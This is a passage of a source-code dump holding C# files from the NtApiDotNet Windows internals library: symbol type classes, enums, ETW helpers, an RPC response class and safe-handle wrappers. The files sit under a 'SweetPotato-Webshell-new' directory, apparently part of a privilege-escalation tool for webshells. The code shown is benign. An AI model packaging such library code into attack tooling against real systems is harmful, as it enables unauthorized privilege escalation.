33 | CrossBitnessType = cross_bitness_type;
34 | _base_method = new Lazy(() => GetMethodInfo(cross_bitness_type));
35 | }
36 |
37 | public T ReadType(NtProcess process, long base_address) where T : struct
38 | {
39 | IConvertToNative converter = (IConvertToNative)_base_method.Value.Invoke(process, new object[] { base_address });
40 | return converter.Convert();
41 | }
42 |
43 | public int GetSize()
44 | {
45 | return System.Runtime.InteropServices.Marshal.SizeOf(CrossBitnessType);
46 | }
47 | }
48 | }
49 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Utilities/Memory/SafeBufferWrapper.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
18 | namespace NtApiDotNet.Utilities.Memory
19 | {
20 | internal class SafeBufferWrapper : SafeBuffer
21 | {
22 | public SafeBufferWrapper(IntPtr buffer)
23 | : base(false)
24 | {
25 | Initialize(int.MaxValue);
26 | handle = buffer;
27 | }
28 |
29 | protected override bool ReleaseHandle()
30 | {
31 | return true;
32 | }
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/ArrayTypeInformation.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Debugger
16 | {
17 | ///
18 | /// Type information for an array.
19 | ///
20 | public class ArrayTypeInformation : TypeInformation
21 | {
22 | ///
23 | /// Get array element type.
24 | ///
25 | public TypeInformation ArrayType { get; }
26 | ///
27 | /// Get number of array elements.
28 | ///
29 | public int Count { get; }
30 |
31 | internal ArrayTypeInformation(int type_index, SymbolLoadedModule module, TypeInformation array_type)
32 | : base(SymTagEnum.SymTagArrayType, 0, type_index, module, string.Empty)
33 | {
34 | ArrayType = array_type;
35 | Count = (int)array_type.Size;
36 | }
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/DataSymbolInformation.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Debugger
16 | {
17 | ///
18 | /// Symbol information for a data value.
19 | ///
20 | public class DataSymbolInformation : SymbolInformation
21 | {
22 | ///
23 | /// Address of the symbol.
24 | ///
25 | public long Address { get; }
26 |
27 | internal DataSymbolInformation(SymTagEnum tag, int size, int type_index,
28 | long address, SymbolLoadedModule module, string name)
29 | : base(tag, size, type_index, module, name)
30 | {
31 | Address = address;
32 | }
33 | }
34 | }
35 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/EnumProcessModulesFilter.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2018 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | // NOTE: This file is a modified version of SymbolResolver.cs from OleViewDotNet
16 | // https://github.com/tyranid/oleviewdotnet. It's been relicensed from GPLv3 by
17 | // the original author James Forshaw to be used under the Apache License for this
18 | // project.
19 |
20 | using System;
21 |
22 | namespace NtApiDotNet.Win32.Debugger
23 | {
24 | [Flags]
25 | enum EnumProcessModulesFilter
26 | {
27 | LIST_MODULES_DEFAULT = 0x00,
28 | LIST_MODULES_32BIT = 0x01,
29 | LIST_MODULES_64BIT = 0x02,
30 | LIST_MODULES_ALL = LIST_MODULES_32BIT | LIST_MODULES_64BIT,
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/EnumTypeInformation.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Collections.Generic;
16 |
17 | namespace NtApiDotNet.Win32.Debugger
18 | {
19 | ///
20 | /// Enumerated type value.
21 | ///
22 | public sealed class EnumTypeInformationValue
23 | {
24 | ///
25 | /// Name of the value.
26 | ///
27 | public string Name { get; }
28 | ///
29 | /// The value as an int64.
30 | ///
31 | public long Value { get; }
32 |
33 | internal EnumTypeInformationValue(string name, long value)
34 | {
35 | Name = name;
36 | Value = value;
37 | }
38 | }
39 |
40 | ///
41 | /// Symbol information for an enumerated type.
42 | ///
43 | public class EnumTypeInformation : TypeInformation
44 | {
45 | ///
46 | /// Get the values for the enumerated type.
47 | ///
48 | public ICollection Values { get; }
49 |
50 | internal EnumTypeInformation(long size, int type_index, SymbolLoadedModule module,
51 | string name, ICollection values)
52 | : base(SymTagEnum.SymTagEnum, size, type_index, module, name)
53 | {
54 | Values = values;
55 | }
56 | }
57 | }
58 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/IMAGEHLP_SYMBOL_TYPE_INFO.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Debugger
16 | {
17 | enum IMAGEHLP_SYMBOL_TYPE_INFO
18 | {
19 | TI_GET_SYMTAG,
20 | TI_GET_SYMNAME,
21 | TI_GET_LENGTH,
22 | TI_GET_TYPE,
23 | TI_GET_TYPEID,
24 | TI_GET_BASETYPE,
25 | TI_GET_ARRAYINDEXTYPEID,
26 | TI_FINDCHILDREN,
27 | TI_GET_DATAKIND,
28 | TI_GET_ADDRESSOFFSET,
29 | TI_GET_OFFSET,
30 | TI_GET_VALUE,
31 | TI_GET_COUNT,
32 | TI_GET_CHILDRENCOUNT,
33 | TI_GET_BITPOSITION,
34 | TI_GET_VIRTUALBASECLASS,
35 | TI_GET_VIRTUALTABLESHAPEID,
36 | TI_GET_VIRTUALBASEPOINTEROFFSET,
37 | TI_GET_CLASSPARENTID,
38 | TI_GET_NESTED,
39 | TI_GET_SYMINDEX,
40 | TI_GET_LEXICALPARENT,
41 | TI_GET_ADDRESS,
42 | TI_GET_THISADJUST,
43 | TI_GET_UDTKIND,
44 | TI_IS_EQUIV_TO,
45 | TI_GET_CALLING_CONVENTION,
46 | TI_IS_CLOSE_EQUIV_TO,
47 | TI_GTIEX_REQS_VALID,
48 | TI_GET_VIRTUALBASEOFFSET,
49 | TI_GET_VIRTUALBASEDISPINDEX,
50 | TI_GET_IS_REFERENCE,
51 | TI_GET_INDIRECTVIRTUALBASECLASS,
52 | TI_GET_VIRTUALBASETABLETYPE,
53 | IMAGEHLP_SYMBOL_TYPE_INFO_MAX
54 | }
55 | }
56 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/MODULEINFO.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2018 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | // NOTE: This file is a modified version of SymbolResolver.cs from OleViewDotNet
16 | // https://github.com/tyranid/oleviewdotnet. It's been relicensed from GPLv3 by
17 | // the original author James Forshaw to be used under the Apache License for this
18 | // project.
19 |
20 | using System;
21 | using System.Runtime.InteropServices;
22 |
23 | namespace NtApiDotNet.Win32.Debugger
24 | {
25 | [StructLayout(LayoutKind.Sequential)]
26 | struct MODULEINFO
27 | {
28 | public IntPtr lpBaseOfDll;
29 | public int SizeOfImage;
30 | public IntPtr EntryPoint;
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/PointerTypeInformation.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Debugger
16 | {
17 | ///
18 | /// Type information for a pointer value.
19 | ///
20 | public class PointerTypeInformation : TypeInformation
21 | {
22 | ///
23 | /// Get the type this pointer references.
24 | ///
25 | public TypeInformation PointerType { get; internal set; }
26 |
27 | ///
28 | /// Indicates this pointer is a reference.
29 | ///
30 | public bool IsReference { get; }
31 |
32 | ///
33 | /// The name of the symbol.
34 | ///
35 | public override string Name => $"{PointerType.Name}*";
36 |
37 | internal PointerTypeInformation(long size, int type_index, SymbolLoadedModule module,
38 | TypeInformation pointer_type, bool is_reference)
39 | : base(SymTagEnum.SymTagPointerType, size, type_index, module, string.Empty)
40 | {
41 | PointerType = pointer_type;
42 | IsReference = is_reference;
43 | }
44 | }
45 | }
46 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/SYM_TYPE.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2018 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | // NOTE: This file is a modified version of SymbolResolver.cs from OleViewDotNet
16 | // https://github.com/tyranid/oleviewdotnet. It's been relicensed from GPLv3 by
17 | // the original author James Forshaw to be used under the Apache License for this
18 | // project.
19 |
20 | namespace NtApiDotNet.Win32.Debugger
21 | {
22 | enum SYM_TYPE
23 | {
24 | SymNone = 0,
25 | SymCoff,
26 | SymCv,
27 | SymPdb,
28 | SymExport,
29 | SymDeferred,
30 | SymSym,
31 | SymDia,
32 | SymVirtual,
33 | NumSymTypes
34 | }
35 | }
36 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/SymTagEnum.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2018 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | // NOTE: This file is a modified version of SymbolResolver.cs from OleViewDotNet
16 | // https://github.com/tyranid/oleviewdotnet. It's been relicensed from GPLv3 by
17 | // the original author James Forshaw to be used under the Apache License for this
18 | // project.
19 |
20 | namespace NtApiDotNet.Win32.Debugger
21 | {
22 | enum SymTagEnum
23 | {
24 | SymTagNull,
25 | SymTagExe,
26 | SymTagCompiland,
27 | SymTagCompilandDetails,
28 | SymTagCompilandEnv,
29 | SymTagFunction,
30 | SymTagBlock,
31 | SymTagData,
32 | SymTagAnnotation,
33 | SymTagLabel,
34 | SymTagPublicSymbol,
35 | SymTagUDT,
36 | SymTagEnum,
37 | SymTagFunctionType,
38 | SymTagPointerType,
39 | SymTagArrayType,
40 | SymTagBaseType,
41 | SymTagTypedef,
42 | SymTagBaseClass,
43 | SymTagFriend,
44 | SymTagFunctionArgType,
45 | SymTagFuncDebugStart,
46 | SymTagFuncDebugEnd,
47 | SymTagUsingNamespace,
48 | SymTagVTableShape,
49 | SymTagVTable,
50 | SymTagCustom,
51 | SymTagThunk,
52 | SymTagCustomType,
53 | SymTagManagedType,
54 | SymTagDimension
55 | }
56 | }
57 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/SymbolInformationType.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Debugger
16 | {
17 | ///
18 | /// Enumeration for symbol type information.
19 | ///
20 | public enum SymbolInformationType
21 | {
22 | ///
23 | /// None.
24 | ///
25 | None = 0,
26 | ///
27 | /// UDT.
28 | ///
29 | UserDefinedType,
30 | ///
31 | /// Enumerated type.
32 | ///
33 | EnumeratedType,
34 | ///
35 | /// A base type.
36 | ///
37 | BaseType,
38 | ///
39 | /// Undefined.
40 | ///
41 | UndefinedType,
42 | }
43 | }
44 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/TI_FINDCHILDREN_PARAMS.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 |
17 | namespace NtApiDotNet.Win32.Debugger
18 | {
19 | [StructLayout(LayoutKind.Sequential), DataStart("ChildId")]
20 | internal struct TI_FINDCHILDREN_PARAMS
21 | {
22 | public int Count;
23 | public int Start;
24 | public int ChildId;
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/TypeInformation.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Debugger
16 | {
17 | ///
18 | /// Symbol information for a type.
19 | ///
20 | public class TypeInformation : SymbolInformation
21 | {
22 | internal TypeInformation(SymTagEnum tag, long size, int type_index, SymbolLoadedModule module, string name)
23 | : base(tag, size, type_index, module, name)
24 | {
25 | }
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/UdtKind.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32.Debugger
16 | {
17 | internal enum UdtKind
18 | {
19 | UdtStruct,
20 | UdtClass,
21 | UdtUnion,
22 | UdtInterface
23 | };
24 | }
25 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/EtwServiceTriggerInformation.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016, 2017 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | namespace NtApiDotNet.Win32
16 | {
17 | #pragma warning disable 1591
18 | public class EtwServiceTriggerInformation : ServiceTriggerInformation
19 | {
20 | public SecurityDescriptor SecurityDescriptor { get; }
21 |
22 | public override void Trigger()
23 | {
24 | using (var reg = EventTracing.Register(SubType))
25 | {
26 | reg.Write();
27 | }
28 | }
29 |
30 | internal EtwServiceTriggerInformation(SERVICE_TRIGGER trigger)
31 | : base(trigger)
32 | {
33 | var sd = EventTracing.QueryTraceSecurity(SubType, false);
34 | if (sd.IsSuccess)
35 | {
36 | SecurityDescriptor = sd.Result;
37 | }
38 | }
39 |
40 | public override string ToString()
41 | {
42 | return base.ToString();
43 | }
44 | }
45 | #pragma warning restore
46 | }
47 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/EventTrace.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
17 | namespace NtApiDotNet.Win32
18 | {
19 | ///
20 | /// Simple class for an event trace.
21 | ///
22 | public sealed class EventTrace : IDisposable
23 | {
24 | private readonly long _handle;
25 |
26 | internal EventTrace(long handle)
27 | {
28 | _handle = handle;
29 | }
30 |
31 | ///
32 | /// Write an empty event.
33 | ///
34 | public void Write()
35 | {
36 | EVENT_DESCRIPTOR desc = new EVENT_DESCRIPTOR()
37 | {
38 | Id = 1,
39 | Level = 4
40 | };
41 | Win32NativeMethods.EventWrite(_handle, ref desc, 0, null).ToNtException();
42 | }
43 |
44 | ///
45 | /// Dispose method.
46 | ///
47 | public void Dispose()
48 | {
49 | Win32NativeMethods.EventUnregister(_handle);
50 | }
51 | }
52 | }
53 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/EventTraceProvider.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
17 | namespace NtApiDotNet.Win32
18 | {
19 | ///
20 | /// Class to represent an Event Trace Provider.
21 | ///
22 | public sealed class EventTraceProvider
23 | {
24 | ///
25 | /// The ID of the provider.
26 | ///
27 | public Guid Id { get; }
28 | ///
29 | /// The name of the provider.
30 | ///
31 | public string Name { get; }
32 | ///
33 | /// Whether the provider is defined as an XML file or a MOF.
34 | ///
35 | public bool FromXml { get; }
36 | ///
37 | /// The provider security descriptor (only available as admin).
38 | ///
39 | public SecurityDescriptor SecurityDescriptor { get; }
40 |
41 | internal EventTraceProvider(Guid id)
42 | : this(id, id.ToString(), false)
43 | {
44 | }
45 |
46 | internal EventTraceProvider(Guid id, string name, bool from_xml)
47 | {
48 | Id = id;
49 | Name = name;
50 | FromXml = from_xml;
51 | SecurityDescriptor = EventTracing.QueryTraceSecurity(Id, false).GetResultOrDefault();
52 | }
53 | }
54 | }
55 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Rpc/RpcClientResponse.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Ndr;
16 | using NtApiDotNet.Ndr.Marshal;
17 | using System.Collections.Generic;
18 | using System.Linq;
19 |
20 | namespace NtApiDotNet.Win32.Rpc
21 | {
22 | ///
23 | /// Response data from an RPC client call.
24 | ///
25 | public sealed class RpcClientResponse
26 | {
27 | ///
28 | /// The marshaled NDR data from the response.
29 | ///
30 | public byte[] NdrBuffer { get; }
31 | ///
32 | /// Any object handles returned in the response. (only for ALPC).
33 | ///
34 | public IEnumerable Handles { get; }
35 | ///
36 | /// Indicates the NDR data representation for the response.
37 | ///
38 | public NdrDataRepresentation DataRepresentation { get; }
39 |
40 | internal RpcClientResponse(byte[] ndr_buffer, IEnumerable handles)
41 | {
42 | NdrBuffer = ndr_buffer;
43 | Handles = new List(handles.Select(o => o.DuplicateObject()));
44 | DataRepresentation = new NdrDataRepresentation();
45 | }
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeAuditBuffer.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Win32.Security.Native;
16 | using System;
17 | using System.Runtime.InteropServices;
18 |
19 | namespace NtApiDotNet.Win32.SafeHandles
20 | {
21 | internal class SafeAuditBuffer : SafeBuffer
22 | {
23 | protected override bool ReleaseHandle()
24 | {
25 | SecurityNativeMethods.AuditFree(handle);
26 | return true;
27 | }
28 |
29 | public SafeAuditBuffer(IntPtr handle, bool owns_handle)
30 | : base(owns_handle)
31 | {
32 | SetHandle(handle);
33 | }
34 |
35 | public SafeAuditBuffer() : base(true)
36 | {
37 | }
38 |
39 | public override bool IsInvalid
40 | {
41 | get
42 | {
43 | return handle == IntPtr.Zero;
44 | }
45 | }
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeAuthZClientContextHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Win32.Security.Native;
16 | using System;
17 | using System.Runtime.InteropServices;
18 |
19 | namespace NtApiDotNet.Win32.SafeHandles
20 | {
21 | internal class SafeAuthZClientContextHandle : SafeHandle
22 | {
23 | protected override bool ReleaseHandle()
24 | {
25 | return SecurityNativeMethods.AuthzFreeContext(handle);
26 | }
27 |
28 | public SafeAuthZClientContextHandle(IntPtr handle, bool owns_handle)
29 | : base(IntPtr.Zero, owns_handle)
30 | {
31 | SetHandle(handle);
32 | }
33 |
34 | public SafeAuthZClientContextHandle()
35 | : base(IntPtr.Zero, true)
36 | {
37 | }
38 |
39 | public override bool IsInvalid
40 | {
41 | get
42 | {
43 | return handle == IntPtr.Zero;
44 | }
45 | }
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeAuthZResourceManagerHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Win32.Security.Native;
16 | using System;
17 | using System.Runtime.InteropServices;
18 |
19 | namespace NtApiDotNet.Win32.SafeHandles
20 | {
21 | internal class SafeAuthZResourceManagerHandle : SafeHandle
22 | {
23 | protected override bool ReleaseHandle()
24 | {
25 | return SecurityNativeMethods.AuthzFreeResourceManager(handle);
26 | }
27 |
28 | public SafeAuthZResourceManagerHandle(IntPtr handle, bool owns_handle)
29 | : base(IntPtr.Zero, owns_handle)
30 | {
31 | SetHandle(handle);
32 | }
33 |
34 | public SafeAuthZResourceManagerHandle()
35 | : base(IntPtr.Zero, true)
36 | {
37 | }
38 |
39 | public override bool IsInvalid
40 | {
41 | get
42 | {
43 | return handle == IntPtr.Zero;
44 | }
45 | }
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeCoTaskMemHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
